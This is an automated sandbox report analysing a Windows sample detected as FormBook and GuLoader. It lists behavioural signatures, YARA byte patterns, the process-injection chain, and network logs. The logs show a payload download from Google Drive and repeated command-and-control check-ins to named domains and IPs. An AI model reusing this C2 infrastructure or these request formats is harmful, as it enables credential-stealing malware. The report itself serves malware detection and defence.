Windows Analysis Report
presupuesto urgente.exe

Overview

General Information

Sample name: presupuesto urgente.exe
Analysis ID: 1525571
MD5: 8ae672783481c0b46780431bfce5a216
SHA1: ace989f4c2a82f48cc3167e531ab13d2999537b2
SHA256: 5e279ef4c54dfc525f423b98054f37ee6eb51a71e8c1f76d5438393055442173

Detection

FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64native
  • presupuesto urgente.exe (PID: 8128 cmdline: "C:\Users\user\Desktop\presupuesto urgente.exe" MD5: 8AE672783481C0B46780431BFCE5A216)
    • presupuesto urgente.exe (PID: 6412 cmdline: "C:\Users\user\Desktop\presupuesto urgente.exe" MD5: 8AE672783481C0B46780431BFCE5A216)
      • qnFwqCOYxcUlZ.exe (PID: 1136 cmdline: "C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • winrs.exe (PID: 2332 cmdline: "C:\Windows\SysWOW64\winrs.exe" MD5: E6C1CE56E6729A0B077C0F2384726B30)
          • firefox.exe (PID: 2460 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)
  • cleanup
No configs have been found
Yara matches (Source | Rule | Description | Author | Strings):
00000004.00000002.12649287914.0000000003010000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000004.00000002.12649287914.0000000003010000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2aa20:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13faf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.8372536747.00000000331E0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000002.00000002.8372536747.00000000331E0000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2aa20:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13faf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000003.00000002.12650331699.00000000013B0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
        No Sigma rule has matched

        AV Detection

        Source: presupuesto urgente.exe, Avira: detected
        Source: www.297tamatest1kb.com, Virustotal: Detection: 8%
        Source: www.gipsytroya.com, Virustotal: Detection: 9%
        Source: presupuesto urgente.exe, ReversingLabs: Detection: 18%
        Source: presupuesto urgente.exe, Virustotal: Detection: 22%
        Source: Yara match, File source: 00000004.00000002.12649287914.0000000003010000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000002.00000002.8372536747.00000000331E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000003.00000002.12650331699.00000000013B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000003.00000002.12651774675.0000000003A80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000004.00000002.12651169047.00000000036E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000004.00000002.12651069125.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000002.00000002.8373636229.0000000034250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: presupuesto urgente.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: unknown, HTTPS traffic detected: 142.251.40.174:443 -> 192.168.11.20:49730 version: TLS 1.2
        Source: unknown, HTTPS traffic detected: 142.250.176.193:443 -> 192.168.11.20:49731 version: TLS 1.2
        Source: presupuesto urgente.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: winrs.pdbGCTL source: presupuesto urgente.exe, 00000002.00000003.8323727937.0000000003598000.00000004.00000020.00020000.00000000.sdmp, qnFwqCOYxcUlZ.exe, 00000003.00000003.8423230370.00000000012D1000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdb source: presupuesto urgente.exe, 00000002.00000001.8031630233.0000000000649000.00000020.00000001.01000000.00000007.sdmp
        Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: qnFwqCOYxcUlZ.exe, 00000003.00000002.12649228198.000000000058E000.00000002.00000001.01000000.0000000B.sdmp
        Source: Binary string: wntdll.pdbUGP source: presupuesto urgente.exe, 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000003.8266535897.0000000033358000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000003.8263145257.00000000331A3000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000004.00000002.12651416729.0000000003900000.00000040.00001000.00020000.00000000.sdmp, winrs.exe, 00000004.00000002.12651416729.0000000003A2D000.00000040.00001000.00020000.00000000.sdmp, winrs.exe, 00000004.00000003.8358482622.000000000374C000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000004.00000003.8355000605.0000000003593000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: presupuesto urgente.exe, presupuesto urgente.exe, 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000003.8266535897.0000000033358000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000003.8263145257.00000000331A3000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000004.00000002.12651416729.0000000003900000.00000040.00001000.00020000.00000000.sdmp, winrs.exe, 00000004.00000002.12651416729.0000000003A2D000.00000040.00001000.00020000.00000000.sdmp, winrs.exe, 00000004.00000003.8358482622.000000000374C000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000004.00000003.8355000605.0000000003593000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: winrs.pdb source: presupuesto urgente.exe, 00000002.00000003.8323727937.0000000003598000.00000004.00000020.00020000.00000000.sdmp, qnFwqCOYxcUlZ.exe, 00000003.00000003.8423230370.00000000012D1000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdbUGP source: presupuesto urgente.exe, 00000002.00000001.8031630233.0000000000649000.00000020.00000001.01000000.00000007.sdmp
        Source: C:\Users\user\Desktop\presupuesto urgente.exe, Code function: 0_2_004066F3 FindFirstFileW,FindClose,0_2_004066F3
        Source: C:\Users\user\Desktop\presupuesto urgente.exe, Code function: 0_2_00405ABE CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405ABE
        Source: C:\Users\user\Desktop\presupuesto urgente.exe, Code function: 0_2_00402862 FindFirstFileW,0_2_00402862

        Networking

        Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49733 -> 185.134.245.113:80
        Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49732 -> 91.195.240.19:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49782 -> 185.134.245.113:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49811 -> 162.255.119.150:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49784 -> 185.134.245.113:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49803 -> 31.217.192.158:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49816 -> 91.195.240.19:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49793 -> 13.248.169.48:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49818 -> 172.66.44.73:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49825 -> 74.208.236.225:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49802 -> 31.217.192.158:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49827 -> 185.134.245.113:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49804 -> 31.217.192.158:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49822 -> 193.108.130.23:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49830 -> 13.248.169.48:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49806 -> 191.101.104.164:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49833 -> 191.101.104.164:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49808 -> 191.101.104.164:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49834 -> 162.255.119.150:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49835 -> 91.195.240.19:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49823 -> 193.108.130.23:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49810 -> 162.255.119.150:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49813 -> 91.195.240.19:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49831 -> 43.252.167.188:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49819 -> 172.66.44.73:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49815 -> 91.195.240.19:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49747 -> 13.248.169.48:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49779 -> 91.195.240.19:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49795 -> 13.248.169.48:80
        Source: DNS query: www.stayvact.xyz
        Source: DNS query: www.99b6q.xyz
        Source: Joe Sandbox View, IP Address: 13.248.169.48
        Source: Joe Sandbox View, IP Address: 31.217.192.158
        Source: Joe Sandbox View, ASN Name: AMAZON-02US
        Source: Joe Sandbox View, ASN Name: DIALTELECOMRO
        Source: Joe Sandbox View, ASN Name: EQUINIX-CONNECT-EMEAGB
        Source: Joe Sandbox View, ASN Name: NAMECHEAP-NETUS
        Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49730 -> 142.251.40.174:443
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1lijlSqItQAppMrLvYydriCj6BfDO7ozU HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /download?id=1lijlSqItQAppMrLvYydriCj6BfDO7ozU&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /71zx/?PbG=AARSfT6a63OJ+ysKR1MfeqvfIcR88MbG43x9Boc0SUqgrVW8gAnMDpyGPh1Ao5w62hQmbE5oBsYcO67emJ0/QAD3KEhLGLbjOOzz32cV6rq6jXBkG/unsus=&m2W4y=eLqP3zSpfDT HTTP/1.1Host: www.eagleup.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
        Source: global trafficHTTP traffic detected: GET /nx20/?PbG=8vcjr86XrLXs9zoo4Sbw2W0gZ8lR0lTZYK7QcbRHGaq0PO2TKOaDXsXOeOMyJFeHWY2gT4U9V3ZC0yqdvgyuEBIfFkSzE9mWCbx3wnDzhu0DVN3ggTcLq/o=&m2W4y=eLqP3zSpfDT HTTP/1.1Host: www.strategyvanguard.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
        Source: global trafficHTTP traffic detected: GET /b2tl/?PbG=WInfWL97QekdPalSc67opDsfGENLX06TmGNVEv6Geo+doMJXHAo9/Rqdqw5O1dkupHqa0ILlPiguACBnPWEgxg52+Lm0TB3eeiGyfSWC0M759S5RsmGy+TM=&m2W4y=eLqP3zSpfDT HTTP/1.1Host: www.philippatston.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
        Source: global trafficHTTP traffic detected: GET /44em/?PbG=iGO2pBA+GdZFzSp95ITiNE0UdXGz/GDPPTuDgRXb9x0A8cbI0BsffOr86U/ry5cw9/6dj1rDQbqcJPAE3iEy6ACI9UEhGVzT4hJYYQarhHeSOj2eWmeo6uY=&m2W4y=eLqP3zSpfDT HTTP/1.1Host: www.stayvact.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
        Source: global trafficHTTP traffic detected: GET /9ned/?PbG=90J5hnkKMqWm95EdODHVgYU8jLlSuqUZOgFf/iPIyrVqxOp5uDPGdLjydK5bectxsy3BttRl3YyLMg8JhxE3vKKk0eEfvV9KpYS9gdBpjJtDcC1yxudRBLM=&m2W4y=eLqP3zSpfDT HTTP/1.1Host: www.sleephygienist.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
        Source: global trafficHTTP traffic detected: GET /y6iz/?PbG=zhQ7Ngng1ztc3XJZIHU9Y/47AI96U2d0+kXKRZ9IAQQLMCXY95UFdstJ1SRqr3k6kIeJ8f3iCIfwSA0tHDQugE4jqofP6h0k5CYKv8JwRObuJO4PUIsN08g=&m2W4y=eLqP3zSpfDT HTTP/1.1Host: www.xn--fhq1c541j0zr.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
        Source: global trafficHTTP traffic detected: GET /h9tv/?PbG=uYvkJTgHEMDqnDyAL7Bx5kFK4VB5WoBnzEJCknt6lKw0HVhBOb4vRoriyZLI8rcuBPdsMwWdB0wPJQDcXjXv1IKIZ3835bSH0Rj2yj0ArB004lLFoiTrAbQ=&m2W4y=eLqP3zSpfDT HTTP/1.1Host: www.jennarauten.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
        Source: global trafficHTTP traffic detected: GET /6s2u/?PbG=LwMCxBNtIktrMj9PGQiKtMV+LJeqJuCob/kDIT9BHmAZvs3jLOO+ZrbeOg0/fIrrzLQ8oyXz+hXEDm3lfyah8CLsJZYqemFEXJ3vaUcAfohhzVyFGy0IUEQ=&m2W4y=eLqP3zSpfDT HTTP/1.1Host: www.taketechai.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
        Source: global trafficHTTP traffic detected: GET /ko0y/?PbG=Gn25S248vYwvg7Jg7plpNM/IO+qTcMdG7TQwLne03JpgtwdJKoWqeQtwalLznrJvxBqGQBXIB3Hty1ARVLJ66f5Bip3WtEch+Xr1s5xY01AltpXHCM6v1G8=&m2W4y=eLqP3zSpfDT HTTP/1.1Host: www.297tamatest1kb.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
        Source: global trafficHTTP traffic detected: GET /qrln/?PbG=g/3tkO+pfBzB25V2Fctu5FsR83L3yxpv2AjDY8JJQQvDhQWyNNgQJTDimODyfvCkj1kKdo2+K9Uv71CRdCP6v9xe1ERDIsip1ir5cWHLWL+Z9Uyq0+QdRb0=&m2W4y=eLqP3zSpfDT HTTP/1.1Host: www.ytfunnels.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
        Source: global trafficHTTP traffic detected: GET /qlei/?PbG=1dhh/rR2+Ao8cSiudW9CEG89SOA5iCCmNAl/rU9Fzwpz0XQlGI+SqOP59XCH8flBSUq99zsbRoSQkEbtVQJkQy88E/1gHIIJW2hLrfVypywFJgwBZQbuFEw=&m2W4y=eLqP3zSpfDT HTTP/1.1Host: www.hedieplastic.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
        Source: global trafficHTTP traffic detected: GET /w8xy/?PbG=9uM5b9ZGQ2xGa/fVJtRXtYM44dIY5ZCO55UnrVzGgcPFgg1e058W5kaq/wWnc0Jau7/b/2o64CBh5aGCaOFYcZtnKviijE7Q36m7HNpI4xddvmt+atSlTsw=&m2W4y=eLqP3zSpfDT HTTP/1.1Host: www.gipsytroya.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
        Source: global trafficHTTP traffic detected: GET /71zx/?aPfP=cNoDEx_hrvchZzh&PbG=AARSfT6a63OJ+ysKR1MfeqvfIcR88MbG43x9Boc0SUqgrVW8gAnMDpyGPh1Ao5w62hQmbE5oBsYcO67emJ0/QAD3KEhLGLbjOOzz32cV6rq6jXBkG/unsus= HTTP/1.1Host: www.eagleup.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
        Source: global trafficHTTP traffic detected: GET /w8xy/?PbG=9uM5b9ZGQ2xGa/fVJtRXtYM44dIY5ZCO55UnrVzGgcPFgg1e058W5kaq/wWnc0Jau7/b/2o64CBh5aGCaOFYcZtnKviijE7Q36m7HNpI4xddvmt+atSlTsw=&1X=S8wx1XUpNBuXlv_ HTTP/1.1Host: www.gipsytroya.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
        Source: unknown
        HTTP traffic detected: POST /nx20/ HTTP/1.1
        Host: www.strategyvanguard.com
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Encoding: gzip, deflate
        Accept-Language: en-US,en
        Connection: close
        Content-Length: 200
        Content-Type: application/x-www-form-urlencoded
        Cache-Control: no-cache
        Origin: http://www.strategyvanguard.com
        Referer: http://www.strategyvanguard.com/nx20/
        User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
        Date: Fri, 04 Oct 2024 09:58:45 GMT
        Server: Apache
        X-Frame-Options: SAMEORIGIN
        Content-Length: 16026
        X-XSS-Protection: 1; mode=block
        Connection: close
        Content-Type: text/html
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
        Date: Fri, 04 Oct 2024 09:58:48 GMT
        Server: Apache
        X-Frame-Options: SAMEORIGIN
        Content-Length: 16026
        X-XSS-Protection: 1; mode=block
        Connection: close
        Content-Type: text/html
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
        Date: Fri, 04 Oct 2024 09:58:51 GMT
        Server: Apache
        X-Frame-Options: SAMEORIGIN
        Content-Length: 16026
        X-XSS-Protection: 1; mode=block
        Connection: close
        Content-Type: text/html
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
        Date: Fri, 04 Oct 2024 09:58:54 GMT
        Server: Apache
        X-Frame-Options: SAMEORIGIN
        Content-Length: 16026
        X-XSS-Protection: 1; mode=block
        Connection: close
        Content-Type: text/html; charset=utf-8
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
        Date: Fri, 04 Oct 2024 10:08:58 GMT
        Server: Apache
        Content-Length: 203
        Connection: close
        Content-Type: text/html; charset=iso-8859-1
        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /y6iz/ was not found on this server.</p></body></html>
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
        Date: Fri, 04 Oct 2024 10:09:01 GMT
        Server: Apache
        Content-Length: 203
        Connection: close
        Content-Type: text/html; charset=iso-8859-1
        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /y6iz/ was not found on this server.</p></body></html>
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
        Date: Fri, 04 Oct 2024 10:09:03 GMT
        Server: Apache
        Content-Length: 203
        Connection: close
        Content-Type: text/html; charset=iso-8859-1
        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /y6iz/ was not found on this server.</p></body></html>
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
        Date: Fri, 04 Oct 2024 10:09:06 GMT
        Server: Apache
        Content-Length: 203
        Connection: close
        Content-Type: text/html; charset=iso-8859-1
        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /y6iz/ was not found on this server.</p></body></html>
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 403 Forbidden
        Server: hcdn
        Date: Fri, 04 Oct 2024 09:59:55 GMT
        Content-Type: text/html
        Content-Length: 4792
        Connection: close
        Vary: Accept-Encoding
        Cross-Origin-Embedder-Policy: require-corp
        Cross-Origin-Opener-Policy: same-origin
        Cross-Origin-Resource-Policy: same-origin
        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
        Referrer-Policy: same-origin
        X-Frame-Options: SAMEORIGIN
        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
        Expires: Thu, 01 Jan 1970 00:00:01 GMT
        alt-svc: h3=":443"; ma=86400
        x-hcdn-request-id: 858c6aaf115336dd4d2eb4e067ddbddb-bos-edge1
        Data Ascii: <html><head><title>Checking your browser before accessing. Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta http-equiv="refresh" content="30"><style>div{text-align:center}.loader{margin:auto;width:50px;padding:8px;aspect-ratio:1;border-radius:50%;background:#25b09b;--_m:conic-gradient(
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 403 Forbidden
        content-length: 93
        cache-control: no-cache
        content-type: text/html
        connection: close
        Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 403 Forbidden
        content-length: 93
        cache-control: no-cache
        content-type: text/html
        connection: close
        Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 403 Forbidden
        content-length: 93
        cache-control: no-cache
        content-type: text/html
        connection: close
        Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
        Cache-Control: private,public
        Content-Type: text/html; charset=utf-8
